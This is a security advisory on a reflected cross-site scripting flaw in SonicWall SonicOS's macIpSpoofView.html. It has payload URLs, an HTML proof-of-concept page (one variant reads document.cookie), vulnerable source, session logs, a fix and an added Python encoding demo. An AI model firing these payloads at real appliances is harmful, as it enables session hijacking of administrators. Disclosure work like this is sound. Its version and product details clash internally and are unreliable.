(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™


SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

Document Title:
===============
SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1359


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1359


Common Vulnerability Scoring System:
====================================
3.0


Product & Service Introduction:
===============================
The proven SonicOS architecture is at the core of every Dell™ SonicWALL™ firewall from the SuperMassive™ E10800 to the TZ 100. 
SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver 
application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) 
technology and other robust security features.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Network-Security-Platform.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a non-persistent (reflected) cross site scripting vulnerability in the web interface of the official SonicWall SonicOS v6.x and v7.5.0.12.


Vulnerability Disclosure Timeline:
==================================
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DELL
Product: Sonicwall SonicOS 7.5.0.12 & v6.x


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple client-side (reflected) cross site scripting vulnerabilities have been discovered in the web interface of the official SonicWall SonicOS v6.x and v7.5.0.12.
The vulnerability allows remote attackers to inject script code into client-side browser requests and thereby compromise the session of the user who opens a crafted link.

The vulnerability is located in the `searchSpoof` and `searchSpoofIpDet` parameters of the `Network > MAC-IP Anti-spoof` module (macIpSpoofView.html). Both values
are reflected into the page without encoding (in the vulnerable source below they land inside the href attribute of the column sort link), so a double quote closes
the attribute and a `>` closes the tag. Remote attackers are therefore able to prepare specially crafted web links that execute client-side script code in the
browser of the victim, in the mac-ip anti spoof module and in the context of whatever SonicOS user/admin session that browser holds on the appliance. The attack
vector is located on the client side of the online service and the request method used to inject and execute the code is GET.

The security risk of the non-persistent cross site scripting vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0.
Exploitation requires no privileged web application user account on the attacker's side and low user interaction: the victim only has to open the crafted link.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent loading
of malicious script code or non-persistent web module context manipulation.

Request Method(s):
    [+] GET

Vulnerable Module(s):
    [+] Network > MAC-IP Anti-spoof

Vulnerable File(s):
    [+] macIpSpoofView.html

Vulnerable Parameter(s):
    [+] searchSpoof
    [+] searchSpoofIpDet


During the client security tests the research team noticed that the official VM version and all appliance models are affected by the security issue. 
The following versions and models of the SonicWall appliance web application are affected by the remote cross site scripting vulnerability.

Affected Model(s):
    [+] (CASS) Anti Spam - UTM Integrated Anti-Spam
    [+] (CASS) Anti Spam - Enhanced Comprehensive Anti-spam
    [+] (CASS) Anti Spam - Email Security

Affected Version(s):
    [+] SonicOS v7.5.0.12
    [+] SonicOS v6.x


Proof of Concept (PoC):
=======================
The client-side cross site scripting vulnerability can be exploited by remote attackers without a privileged application user account and 
with low or medium user interaction. For security demonstration or to reproduce the vulnerability, follow the information and steps below.


PoC: Payload(s)
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert(%22PENTEST%22)%20%3C&searchSpoofIpDet=[x]

https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20


PoC: Exploit

<html>
<head>
<title>Sonicwall AntiSpam "SonicOS Enhanced 5.9.0.7" - (searchSpoof & searchSpoofIpDet) Cross Site Scripting PoC</title>
</head>
<body>
<!-- searchSpoof: break out of the href attribute and inject an iframe whose onload handler runs script -->
<iframe src='https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert(%22PENTEST%22)%20%3C&searchSpoofIpDet=[x]'></iframe>
<br>
<!-- searchSpoofIpDet: same injection through the second reflected parameter -->
<img src='https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=[x]&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20'>
<br>
<!-- both parameters at once, reading the session cookie instead of showing a marker -->
<iframe src='https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3Cimg%20src=http://www.vulnerability-lab.com/files/ptest.png%20onload=alert(document.cookie)%20%3C&searchSpoofIpDet=%22%3E%3Cimg%20src=http://www.vulnerability-lab.com/files/ptest.png%20onload=alert(document.cookie)%20%3C'></iframe>
</body>
</html>

Note: The PoC exploits the cross site scripting vulnerability in the searchSpoof and searchSpoofIpDet values of the macIpSpoofView.html file.



PoC: Vulnerable Source

<td class="listLabel" align="left" nowrap="" width="15%">
<span class="objItemSpacing">
<input title="" name="capCbox" onclick="checkAllSpoofIp(this);" onfocus="if (this.disabled) { this.blur(); }" type="checkbox">
</span>
    <span class="listLabel" align="left" nowrap="">
     <script type="text/JavaScript">
     <!--
      setSpoofIpColHead(1, 'IP Address');
     // -->
</script><a class="tableLink" href="/macIpSpoofView.html?tableSortCol=1&tableSortInverted=0&
searchSpoof="><[CLIENT-SIDE SCRIPT CODE EXECUTION!];)" &searchspoofipdet="&startItem=0&startItemIpDet=0"">IP Address</a>
    </span>
   </td>
   <td class="listLabel" align="left" width="10%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(2, 'Type');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="10%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(3, 'Interface');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="15%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(4, 'MAC Address');
    // -->
    </script>
   </td>
   <td class="listLabel" align="left" width="20%" nowrap>
    <script type="text/JavaScript">
    <!--
     setSpoofIpColHead(5, 'Host Name');
    // -->
    </script>
   </td>



--- PoC Session Logs [GET] ---
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet= Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 

GET https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=&searchSpoofIpDet=%22%3E%3Ciframe%20src%3Da%20onload%3Dalert%28%22PENTEST%22%29%20 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Header:
      Host[cass240.demo.sonicwall.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cass240.demo.sonicwall.com/macIpSpoofView.html]
      Cookie[__utma=227649090.564465250.1416863624.1416865480.1417100584.3; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1; __utmb=227649090.2.10.1417100584; __utmt=1; _gat=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 
GET https://cas.127.0.0.1:8080/[CLIENT-SIDE SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet=]
      Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html;charset=UTF-8]


Reference(s):
https://cas.127.0.0.1:8080/
https://cas.127.0.0.1:8080/macIpSpoofView.html
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable searchSpoof and searchSpoofIpDet parameters.
Restrict the allowed input of the values and encode the output for the context in which macIpSpoofView.html reflects them: percent-encode each value
when it is placed into the generated sort-link URL, and HTML-attribute-encode the finished href, so that a double quote or `>` in the input can no longer
close the attribute or the tag. Restricting the input alone is not sufficient, because the reflection point, not the search itself, is what executes the script.
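To make the reflection described in the technical details and the fix called for above concrete, the following Python example is added here; it is not code from the advisory, from Vulnerability Laboratory or from SonicWall. It models the column sort link shown in the vulnerable source (the href into which searchSpoof and searchSpoofIpDet are reflected) in two versions: the unencoded one the advisory describes, and a hardened one that percent-encodes each value for the URL and then HTML-attribute-encodes the finished href. The rendering functions, their names and the exact shape of the generated URL are assumptions for the example; the payload is the advisory's own. A small parser-based check shows that the injected iframe becomes a real element in the vulnerable output and does not in the fixed one; the same check can be run over a captured response body.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed stand-in for the column sort link in macIpSpoofView.html.
# The page path and parameter names come from the advisory; that the link is
# built server-side in exactly this shape is an assumption for this example.
PAGE = "/macIpSpoofView.html"

# The advisory's searchSpoofIpDet payload: closes the href attribute and the
# <a> tag, then injects an iframe whose onload handler runs script.
PAYLOAD = '"><iframe src=a onload=alert("PENTEST") '


def sort_link_vulnerable(search_spoof: str, search_spoof_ip_det: str, col: int = 1) -> str:
    """Reflects both search values into the href without any encoding (the bug)."""
    href = (
        f"{PAGE}?tableSortCol={col}&tableSortInverted=0"
        f"&searchSpoof={search_spoof}&searchSpoofIpDet={search_spoof_ip_det}"
        "&startItem=0&startItemIpDet=0"
    )
    return f'<a class="tableLink" href="{href}">IP Address</a>'


def sort_link_fixed(search_spoof: str, search_spoof_ip_det: str, col: int = 1) -> str:
    """Same link with one encoding layer per context the value passes through:
    percent-encoding for the query string, then HTML attribute encoding for href."""
    query = urlencode({
        "tableSortCol": col,
        "tableSortInverted": 0,
        "searchSpoof": search_spoof,
        "searchSpoofIpDet": search_spoof_ip_det,
        "startItem": 0,
        "startItemIpDet": 0,
    })
    href = html.escape(f"{PAGE}?{query}", quote=True)
    return f'<a class="tableLink" href="{href}">IP Address</a>'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def rendered_tags(body: str) -> list[str]:
    """Start tags in a response body; an injected iframe shows up here only if
    the reflection really broke out of the attribute and the enclosing tag."""
    collector = _TagCollector()
    collector.feed(body)
    collector.close()
    return collector.tags


def reflects_unencoded(body: str, payload: str) -> bool:
    """Raw check for a captured response: the payload appears byte-for-byte,
    so neither the URL context nor the attribute context encoded it."""
    return payload in body


if __name__ == "__main__":
    for label, render in (("vulnerable", sort_link_vulnerable), ("fixed", sort_link_fixed)):
        body = render("", PAYLOAD)
        print(f"{label}: tags={rendered_tags(body)} unencoded={reflects_unencoded(body, PAYLOAD)}")
        print("  " + body)
```

reflects_unencoded() is deliberately a plain substring test, which is what you want when eyeballing a raw response; rendered_tags() is the stricter check, since an encoded reflection can still contain the text "iframe" without ever producing an element. Note that the fixed link does not reject the input at all: the search string still reaches the server unchanged, it just can no longer change the structure of the page.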


Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the macIpSpoofView.html file is estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The Vulnerability Laboratory disclaimer, contact details and copyright notice for this advisory are identical to the text reproduced above.